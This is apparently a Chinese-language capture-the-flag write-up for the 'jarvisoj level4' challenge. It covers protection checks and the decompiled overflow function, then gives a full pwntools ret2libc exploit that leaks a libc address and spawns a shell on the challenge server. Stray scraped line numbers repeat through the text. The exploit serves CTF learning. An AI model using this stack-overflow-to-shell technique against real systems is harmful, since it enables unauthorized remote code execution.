jarvisoj level4
# jarvisoj level4
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/jarvisoj_level4/level4'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
vulnerable_function();
write(1, "Hello, World!\n", 0xEu);
return 0;
}
1
2
3
4
5
6
2
3
4
5
6
vulnerable_function函数如下
ssize_t vulnerable_function()
{
char buf[136]; // [esp+0h] [ebp-88h] BYREF
return read(0, buf, 0x100u);
}
1
2
3
4
5
6
2
3
4
5
6
# 思路分析
- 目前信息:
vulnerable_function
函数可溢出- 无
system
、/bin/sh
与后门函数 - No canary found
- NX enabled
- No PIE
- 思路:
- 典型的
ret2libc
解法
- 典型的
# exp
from pwn import *
from LibcSearcher import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/jarvisoj_level4/level4'
io = remote('node4.buuoj.cn', 26609)
# io = process(pwnfile)
elf = ELF(pwnfile)
padding = 136+4
libc_start_main_got = elf.got['__libc_start_main']
write_plt = elf.plt['write']
vulnerable_function = elf.symbols['vulnerable_function']
payload = flat(['a'*padding, write_plt, vulnerable_function,1, libc_start_main_got, 4])
io.send(payload)
leak_libc_start_main = u32(io.recv(4))
success("leak_libc_start_main:"+hex(leak_libc_start_main))
libc = LibcSearcher('__libc_start_main', leak_libc_start_main)
libc_base = leak_libc_start_main-libc.dump('__libc_start_main')
system = libc_base+libc.dump('system')
bin_sh = libc_base+libc.dump('str_bin_sh')
payload = flat(['a'*padding, system, 0xdeadbeef, bin_sh])
io.send(payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
上次更新: 2022/08/15, 00:29:49